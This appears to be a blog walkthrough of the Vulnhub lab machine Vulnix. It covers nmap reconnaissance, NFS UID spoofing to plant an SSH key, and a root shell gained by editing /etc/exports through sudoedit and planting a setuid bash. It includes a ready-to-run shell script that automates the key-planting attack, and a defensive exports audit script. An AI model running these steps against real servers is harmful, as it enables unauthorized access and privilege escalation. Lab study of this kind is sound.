
Monday, August 23, 2021

Vulnix - VULNHUB - Linux




Complete walkthrough of the machine, phase by phase:

RECONNAISSANCE PHASE:

NETWORK DISCOVERY:


Several tools can do this job. One of them is arp-scan, which sends an ARP request for every address in the local subnet and lists the hosts that answer. Because ARP never leaves the local segment, this only works when the attacker and the target share a layer-2 network; it is quick and does not depend on the target answering ICMP.



NMAP:

In this step we enumerate, from the attacker machine, the open ports and the services behind them on the target. The -sC option runs the default NSE scripts and -sV probes service versions, which gives a first picture of what may be vulnerable; -p- covers all 65535 TCP ports, -n skips DNS resolution, -v shows progress and -oN saves the normal output to a file.


nmap -sC -sV -n -v -p - 192.168.1.33 -oN target_nmap

Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-23 00:56 CEST

NSE: Loaded 153 scripts for scanning.

NSE: Script Pre-scanning.

Initiating NSE at 00:56

Completed NSE at 00:56, 0.00s elapsed

Initiating NSE at 00:56

Completed NSE at 00:56, 0.00s elapsed

Initiating NSE at 00:56

Completed NSE at 00:56, 0.00s elapsed

Initiating Ping Scan at 00:56

Scanning 192.168.1.33 [2 ports]

Completed Ping Scan at 00:56, 0.00s elapsed (1 total hosts)

Initiating Connect Scan at 00:56

Scanning 192.168.1.33 [65535 ports]

Discovered open port 995/tcp on 192.168.1.33

Discovered open port 143/tcp on 192.168.1.33

Discovered open port 993/tcp on 192.168.1.33

Discovered open port 110/tcp on 192.168.1.33

Discovered open port 111/tcp on 192.168.1.33

Discovered open port 25/tcp on 192.168.1.33

Discovered open port 22/tcp on 192.168.1.33

Discovered open port 37893/tcp on 192.168.1.33

Discovered open port 2049/tcp on 192.168.1.33

Discovered open port 46912/tcp on 192.168.1.33

Discovered open port 513/tcp on 192.168.1.33

Discovered open port 38416/tcp on 192.168.1.33

Discovered open port 514/tcp on 192.168.1.33

Discovered open port 47876/tcp on 192.168.1.33

Discovered open port 79/tcp on 192.168.1.33

Discovered open port 512/tcp on 192.168.1.33

Discovered open port 51379/tcp on 192.168.1.33

Completed Connect Scan at 00:56, 2.60s elapsed (65535 total ports)

Initiating Service scan at 00:56

Scanning 17 services on 192.168.1.33

Completed Service scan at 00:59, 156.24s elapsed (17 services on 1 host)

NSE: Script scanning 192.168.1.33.

Initiating NSE at 00:59

Completed NSE at 00:59, 12.38s elapsed

Initiating NSE at 00:59

Completed NSE at 00:59, 1.17s elapsed

Initiating NSE at 00:59

Completed NSE at 00:59, 0.00s elapsed

Nmap scan report for 192.168.1.33

Host is up (0.0020s latency).

Not shown: 65518 closed ports

PORT      STATE SERVICE    VERSION

22/tcp    open  ssh        OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey: 

|   1024 10:cd:9e:a0:e4:e0:30:24:3e:bd:67:5f:75:4a:33:bf (DSA)

|   2048 bc:f9:24:07:2f:cb:76:80:0d:27:a6:48:52:0a:24:3a (RSA)

|_  256 4d:bb:4a:c1:18:e8:da:d1:82:6f:58:52:9c:ee:34:5f (ECDSA)

25/tcp    open  smtp       Postfix smtpd

|_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 

|_ssl-date: 2021-08-22T22:59:50+00:00; +2s from scanner time.

79/tcp    open  finger     Linux fingerd

|_finger: No one logged on.\x0D

110/tcp   open  pop3?

|_ssl-date: 2021-08-22T22:59:50+00:00; +2s from scanner time.

111/tcp   open  rpcbind    2-4 (RPC #100000)

| rpcinfo: 

|   program version    port/proto  service

|   100000  2,3,4        111/tcp   rpcbind

|   100000  2,3,4        111/udp   rpcbind

|   100000  3,4          111/tcp6  rpcbind

|   100000  3,4          111/udp6  rpcbind

|   100003  2,3,4       2049/tcp   nfs

|   100003  2,3,4       2049/tcp6  nfs

|   100003  2,3,4       2049/udp   nfs

|   100003  2,3,4       2049/udp6  nfs

|   100005  1,2,3      41209/udp6  mountd

|   100005  1,2,3      45553/udp   mountd

|   100005  1,2,3      51379/tcp   mountd

|   100005  1,2,3      56771/tcp6  mountd

|   100021  1,3,4      37893/tcp   nlockmgr

|   100021  1,3,4      44447/tcp6  nlockmgr

|   100021  1,3,4      45234/udp   nlockmgr

|   100021  1,3,4      50152/udp6  nlockmgr

|   100024  1          38416/tcp   status

|   100024  1          40861/tcp6  status

|   100024  1          43135/udp   status

|   100024  1          49746/udp6  status

|   100227  2,3         2049/tcp   nfs_acl

|   100227  2,3         2049/tcp6  nfs_acl

|   100227  2,3         2049/udp   nfs_acl

|_  100227  2,3         2049/udp6  nfs_acl

143/tcp   open  imap       Dovecot imapd

|_ssl-date: 2021-08-22T22:59:50+00:00; +2s from scanner time.

512/tcp   open  exec       netkit-rsh rexecd

513/tcp   open  login?

514/tcp   open  tcpwrapped

993/tcp   open  ssl/imaps?

| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server

| Issuer: commonName=vulnix/organizationName=Dovecot mail server

| Public Key type: rsa

| Public Key bits: 2048

| Signature Algorithm: sha1WithRSAEncryption

| Not valid before: 2012-09-02T17:40:22

| Not valid after:  2022-09-02T17:40:22

| MD5:   2b3f 3e28 c85d e10c 7b7a 2435 c5e7 84fc

|_SHA-1: 4a49 a407 01f1 37c8 81a3 4519 981b 1eee 6856 348e

|_ssl-date: 2021-08-22T22:59:50+00:00; +2s from scanner time.

995/tcp   open  ssl/pop3s?

| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server

| Issuer: commonName=vulnix/organizationName=Dovecot mail server

| Public Key type: rsa

| Public Key bits: 2048

| Signature Algorithm: sha1WithRSAEncryption

| Not valid before: 2012-09-02T17:40:22

| Not valid after:  2022-09-02T17:40:22

| MD5:   2b3f 3e28 c85d e10c 7b7a 2435 c5e7 84fc

|_SHA-1: 4a49 a407 01f1 37c8 81a3 4519 981b 1eee 6856 348e

|_ssl-date: 2021-08-22T22:59:50+00:00; +2s from scanner time.

2049/tcp  open  nfs_acl    2-3 (RPC #100227)

37893/tcp open  nlockmgr   1-4 (RPC #100021)

38416/tcp open  status     1 (RPC #100024)

46912/tcp open  mountd     1-3 (RPC #100005)

47876/tcp open  mountd     1-3 (RPC #100005)

51379/tcp open  mountd     1-3 (RPC #100005)

Service Info: Host:  vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel


Host script results:

|_clock-skew: mean: 1s, deviation: 0s, median: 1s


NSE: Script Post-scanning.

Initiating NSE at 00:59

Completed NSE at 00:59, 0.00s elapsed

Initiating NSE at 00:59

Completed NSE at 00:59, 0.00s elapsed

Initiating NSE at 00:59

Completed NSE at 00:59, 0.00s elapsed

Read data files from: /usr/bin/../share/nmap

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 172.79 seconds



Summary of the nmap scan, the open ports and the services behind them:

22/tcp    ssh      OpenSSH 5.9p1 (Ubuntu)
25/tcp    smtp     Postfix (VRFY is enabled, so usernames can be checked)
79/tcp    finger   Linux fingerd (another source of usernames)
110/tcp   pop3     not fingerprinted by nmap
111/tcp   rpcbind  portmapper; rpcinfo lists nfs, mountd, nlockmgr and status
143/tcp   imap     Dovecot imapd
512/tcp   exec     netkit rexecd
513/tcp   login    rlogin (by port convention; nmap could not confirm)
514/tcp   shell    rsh (tcpwrapped)
993/tcp   imaps    Dovecot, self-signed certificate CN=vulnix
995/tcp   pop3s    Dovecot, self-signed certificate CN=vulnix
2049/tcp  nfs      NFS v2/v3/v4 plus nfs_acl
high ports         mountd, nlockmgr and status on dynamic RPC ports

The r-services on 512-514 and the NFS server on 2049 are the interesting targets; the rest of this walkthrough goes through NFS.




EXPLOITATION:


22/tcp ssh test

A first root login attempt fails before any authentication happens: the ECDSA host key presented by 192.168.1.33 does not match the one stored in the local known_hosts (typically a stale entry from another lab VM that used the same address), so OpenSSH refuses the connection. In a lab the fix is the ssh-keygen -R command shown in the message; against a real target this warning is exactly the signal that a host key changed and must not be clicked through.

ssh root@192.168.1.33
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@    WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!     @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that a host key has just been changed.
The fingerprint for the ECDSA key sent by the remote host is
SHA256:IGOuLMZRTuUvY58a8TN+ef/1zyRCAHk0qYP4wMViOAg.
Please contact your system administrator.
Add correct host key in /home/kali/.ssh/known_hosts to get rid of this message.
Offending ECDSA key in /home/kali/.ssh/known_hosts:8
  remove with:
  ssh-keygen -f "/home/kali/.ssh/known_hosts" -R "192.168.1.33"
ECDSA host key for 192.168.1.33 has changed and you have requested strict checking.
Host key verification failed.




NFS exploitation

mountd lets anyone list what the server exports, no credentials required:

showmount -e 192.168.1.33
Export list for 192.168.1.33:
/home/vulnix *

The home directory of the user vulnix is exported to every host (*). NFSv3 trusts the UID/GID that the client sends (AUTH_SYS): with root_squash only UID 0 is remapped to nobody, every other UID is honoured as-is. So a client process running with the same UID as the export's owner can write into that home directory as vulnix, and an SSH public key dropped into .ssh/authorized_keys gives us a shell. Step by step:

1. Create a local user vulnix whose UID and GID match the owner of the export (2008 on the target, as the NFS listing further down shows):

cat /etc/passwd | grep vulnix
vulnix:x:2008:2008::/home/vulnix:/bin/sh

(See man useradd: the -u and -g options set the numeric IDs. The name is irrelevant to NFS, only the numbers are compared.)


2. As that user, generate an RSA key pair with ssh-keygen (no passphrase); the public half is what we will place on the target:

su - vulnix
Password: 
$ bash
vulnix@kali:~$ pwd
/home/vulnix
vulnix@kali:~$ ssh-keygen 
Generating public/private rsa key pair.
Enter file in which to save the key (/home/vulnix/.ssh/id_rsa): 
Created directory '/home/vulnix/.ssh'.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/vulnix/.ssh/id_rsa
Your public key has been saved in /home/vulnix/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:2CRMZ7IqD2D0B/vUe/OzZIX39oBIB7TqshgmRVshfhU vulnix@kali
The key's randomart image is:
+---[RSA 3072]----+
| . .. + E..      |
|. ..o+.B . .     |
|.. ooo*.. o      |
|.. .+= =.. ..    |
|  o +...So...o   |
|   =   ...ooo..  |
|  . + . . .=. .o |
|   o o o  o o ...|
|    . .    .    .|
+----[SHA256]-----+

3. Install the public key as authorized_keys. The post simply renames id_rsa.pub; copying it works just as well. This is the file sshd on the target will check, so it must end up in /home/vulnix/.ssh on the export:

vulnix@kali:~/.ssh$ mv id_rsa.pub  authorized_keys
vulnix@kali:~/.ssh$ ls -ltrh
total 12K
-rw------- 1 vulnix vulnix 2,6K Aug 23 11:54 id_rsa
-rw-r--r-- 1 vulnix vulnix  565 Aug 23 11:54 authorized_keys
-rw-r--r-- 1 vulnix vulnix  222 Aug 23 11:59 known_hosts

4. Use NfSpy, an ID-spoofing NFS client. It talks to the NFS server directly (no kernel mount) and puts the UID/GID of each file's owner into the RPC credentials it sends, so it can read and write the export as 2008 regardless of which local account runs it:

git clone https://github.com/bonsaiviking/NfSpy.git
Cloning into 'NfSpy'...
remote: Enumerating objects: 399, done.
remote: Total 399 (delta 0), reused 0 (delta 0), pack-reused 399
Receiving objects: 100% (399/399), 99.07 KiB | 1.08 MiB/s, done.
Resolving deltas: 100% (218/218), done.

sudo PYTHONPATH=. python scripts/nfspysh -o server=192.168.1.33:/home/vulnix
[sudo] password for kali: 
nfspy@192.168.1.33:/home/vulnix:/> ls
/:
040750   2008   2008        4096 2021-08-23 02:34:14 .
100644   2008   2008         220 2012-04-03 17:58:14 .bash_logout
040755   2008   2008        4096 2021-08-23 02:34:36 .ssh
100644   2008   2008         675 2012-04-03 17:58:14 .profile
040750   2008   2008        4096 2021-08-23 02:34:14 ..
100644   2008   2008        3486 2012-04-03 17:58:14 .bashrc
nfspy@192.168.1.33:/home/vulnix:/> cd .ssh      

5. Upload authorized_keys into the .ssh directory of the export. Note that nfspysh's ls does not accept ls(1) flags: "ls -ltrh" is interpreted as a path, which is why it answers "No such file or directory":

 put /home/vulnix/.ssh/authorized_keys
nfspy@192.168.1.33:/home/vulnix:/.ssh> ls -ltrh
No such file or directory
nfspy@192.168.1.33:/home/vulnix:/.ssh> ls
/.ssh:
040755   2008   2008        4096 2021-08-23 07:22:12 .
100644   2008   2008         565 2021-08-23 07:22:12 authorized_keys
040750   2008   2008        4096 2021-08-23 02:34:14 ..
100644   2008   2008         565 2021-08-23 07:15:45 id_rsa.pub

File content:
cat authorized_keys
ssh-rsa ... vulnix@kali


6. SSH connection.

Connect as vulnix from the attacker machine. Run ssh as the local vulnix user so the key from step 2 is picked up automatically (or pass it explicitly with -i /home/vulnix/.ssh/id_rsa):

ssh vulnix@192.168.1.33

sshd accepts the key because authorized_keys is owned by UID 2008 and is not writable by group or others; with looser permissions StrictModes would reject it.
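The six steps above as one script, added here as an example; it is not part of the original post. It uses a kernel NFS mount (nfs-common) instead of NfSpy and assumes it runs as root on the attacker machine, that the export is the remote user's home directory and that its basename is the remote login name; TARGET, MNT and LOCAL_USER are placeholders you override through the environment.

```shell
#!/bin/sh
# Added example for this walkthrough, not the original post's commands.
# Automates steps 1-6: find the export, mount it with NFSv3 (raw numeric ids,
# no idmapd confusion), read the owner UID of the exported home, create a
# local user with that UID, and plant an SSH key as that user.
# Assumptions (not from the post): nfs-common and openssh-client are present,
# the script runs as root on Linux (GNU stat), the exported directory is the
# remote user's home and its basename is the remote login name.
set -eu

TARGET="${TARGET:-192.168.1.33}"      # lab IP from the post
MNT="${MNT:-/mnt/nfs_target}"         # assumed local mount point
LOCAL_USER="${LOCAL_USER:-nfsuser}"   # assumed local account name

# Turn "showmount -e" output into "path clients" lines, skipping the header.
parse_showmount() {
    awk 'NR > 1 && NF >= 2 { print $1, $2 }'
}

# Path of the first export (enough when the server exports a single home).
first_export() {
    parse_showmount | awk 'NR == 1 { print $1 }'
}

# The attack itself; only runs when RUN_EXPLOIT=1 so the helpers can be tested.
main() {
    export_path="$(showmount -e "$TARGET" | first_export)"
    [ -n "$export_path" ] || { echo "no NFS export found on $TARGET" >&2; exit 1; }
    remote_user="$(basename "$export_path")"   # assumption: export is /home/<user>

    mkdir -p "$MNT"
    # vers=3: the server's numeric ids are shown as-is; with v4 and no idmapd
    # they appear as nobody/4294967294 and cannot be matched.
    mount -t nfs -o vers=3,nolock "$TARGET:$export_path" "$MNT"
    uid="$(stat -c %u "$MNT")"
    gid="$(stat -c %g "$MNT")"
    echo "export $export_path is owned by uid=$uid gid=$gid" >&2

    # root_squash only remaps uid 0; a local user with the owner's uid is
    # accepted by the server as that owner (AUTH_SYS credentials).
    getent group "$gid" >/dev/null || groupadd -g "$gid" "$LOCAL_USER"
    id -u "$LOCAL_USER" >/dev/null 2>&1 || \
        useradd -u "$uid" -g "$gid" -m -s /bin/sh "$LOCAL_USER"

    su -l -s /bin/sh -c "
        set -e
        umask 077
        mkdir -p ~/.ssh
        [ -f ~/.ssh/id_rsa ] || ssh-keygen -q -t rsa -N '' -f ~/.ssh/id_rsa
        mkdir -p '$MNT/.ssh'
        cat ~/.ssh/id_rsa.pub >> '$MNT/.ssh/authorized_keys'
        # sshd StrictModes: key file owned by the user, not group/world writable
        chmod 700 '$MNT/.ssh'; chmod 600 '$MNT/.ssh/authorized_keys'
        exec ssh -i ~/.ssh/id_rsa '$remote_user@$TARGET'
    " "$LOCAL_USER"
}

if [ "${RUN_EXPLOIT:-0}" = 1 ]; then
    main
fi
```

Run it as root with RUN_EXPLOIT=1 TARGET=<ip>; without that variable it only defines the helpers. The whole trick rests on the server believing the client's numeric UID, which is why matching 2008 matters and the local user name does not.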




PRIVILEGE ESCALATION:

We should review sudo permissions for vulnix user:

vulnix@vulnix:~$ sudo -l
Matching 'Defaults' entries for vulnix on this host:
    env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User vulnix may run the following commands on this host:
    (root) sudoedit /etc/exports, (root) NOPASSWD: sudoedit /etc/exports

So the system lets the vulnix user run exactly one command as root, and without a password:

 sudoedit /etc/exports

 cat /etc/exports 
# /etc/exports: the access control list for filesystems which may be exported
#               to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/home/vulnix    *(rw,root_squash)

The root_squash option maps requests that arrive as UID 0 to the anonymous user (nobody), so a remote root cannot create root-owned files on the export; a setuid binary dropped there would belong to nobody, not root.

But we can edit /etc/exports as root with sudoedit and remove that protection ourselves. The edited file below exports the whole filesystem (/) with no_root_squash. Note that nfsd does not re-read /etc/exports on its own: the new export only takes effect after exportfs -ra, which vulnix cannot run, or after the NFS service (or the whole VM) is restarted.

cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
#               to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
#/home/vulnix   *(rw,no_root_squash)
/       *(rw,no_root_squash)
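To see at a glance what changed between the two versions of /etc/exports, here is a small audit script, added as an example and not from the original post. audit_exports, count_risks, allows_remote_root and the two sample files (constructed from the listings above) are my names; the parser follows the exports(5) syntax shown here, including the classic pitfall of a space before the option list.

```shell
#!/bin/sh
# Added example, not the original post's commands: a small audit of
# /etc/exports that flags the settings this privilege escalation depends on.
# audit_exports reads an exports file on stdin and prints one
# "RISK <path> <client> <reason>" line per finding.

audit_exports() {
    awk '
    { sub(/#.*/, "") }                 # drop comments; $0 is re-split
    /^[ \t]*$/ { next }                # skip blank lines
    {
        path = $1
        for (i = 2; i <= NF; i++) {
            spec = $i; client = spec; opts = ""
            p = index(spec, "(")
            if (p > 0) {
                client = substr(spec, 1, p - 1)
                opts = substr(spec, p + 1)
                sub(/\)$/, "", opts)
            }
            # "/srv (rw)" with a space before "(" means options for everyone
            if (client == "") client = "*"
            rw = 0; nrs = 0; insecure = 0
            n = split(opts, o, ",")
            for (j = 1; j <= n; j++) {
                if (o[j] == "rw") rw = 1
                if (o[j] == "no_root_squash") nrs = 1
                if (o[j] == "insecure") insecure = 1
            }
            if (client == "*")        print "RISK", path, client, "exported_to_any_host"
            if (client == "*" && rw)  print "RISK", path, client, "writable_by_any_host"
            if (nrs)                  print "RISK", path, client, "no_root_squash"
            if (path == "/")          print "RISK", path, client, "whole_filesystem_exported"
            if (insecure)             print "RISK", path, client, "insecure_client_ports"
        }
    }'
}

# Number of findings for an exports file passed as a string.
count_risks() {
    printf '%s\n' "$1" | audit_exports | awk 'END { print NR }'
}

# Exit 0 if some export lets a remote root stay root (what the setuid trick needs).
allows_remote_root() {
    printf '%s\n' "$1" | audit_exports | grep -q ' no_root_squash$'
}

# Sample files constructed from the two listings in this post (comments trimmed).
ORIGINAL_EXPORTS='# /etc/exports: the access control list for filesystems which may be exported
/home/vulnix    *(rw,root_squash)'

MODIFIED_EXPORTS='#/home/vulnix   *(rw,no_root_squash)
/       *(rw,no_root_squash)'

# Demo: the edited file yields four findings, the original two.
printf '%s\n' "$MODIFIED_EXPORTS" | audit_exports
```

Against the original file you get two findings (export to any host, writable by any host); against the edited file four, including no_root_squash on /, which is the condition the setuid trick needs. The same check belongs in a hardening baseline: no_root_squash should never sit next to a wildcard client.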


On the attacker machine we can now mount the root export like any other filesystem:

root@kali:/mnt# mkdir /mnt/vulnix
root@kali:/mnt# mount.nfs 192.168.1.33:/ /mnt/vulnix/
root@kali:/mnt# cd vulnix/
root@kali:/mnt/vulnix# ls -ltrh
total 4,0K
drwxr-xr-x 4 nobody 4294967294 4,0K sep  2  2012 home

The owner column shows nobody/4294967294 only because the NFSv4 client has no idmapd mapping for the server's IDs; on disk the server keeps the raw numeric IDs, and that is what matters here. With / exported as rw,no_root_squash, a file written through the mount by the local root is stored on the target as owned by UID 0, the target's own root. Copy a bash binary into vulnix's home (it must be a build the target can actually run; the target's own /bin/bash, now readable through the mount, avoids any libc mismatch):

root@kali:/mnt/vulnix/home/vulnix# cp /tmp/bash .

Then set the setuid bit on it. A setuid executable runs with the effective UID of its owner, root in this case, whoever starts it:

root@kali:/mnt/vulnix/home/vulnix# chmod 4777 bash


And on the target machine, as vulnix, we run ./bash -p. The -p flag matters: without it bash notices that the effective UID differs from the real UID and drops the privilege before running anything; with -p it keeps EUID 0 and we have a root shell.




And that is all for this lab machine. I hope you enjoyed this Linux server and that you will follow my blog [https://roadtooscp-f0ns1.blogspot.com/]. We'll keep in touch.

With kind regards, f0ns1



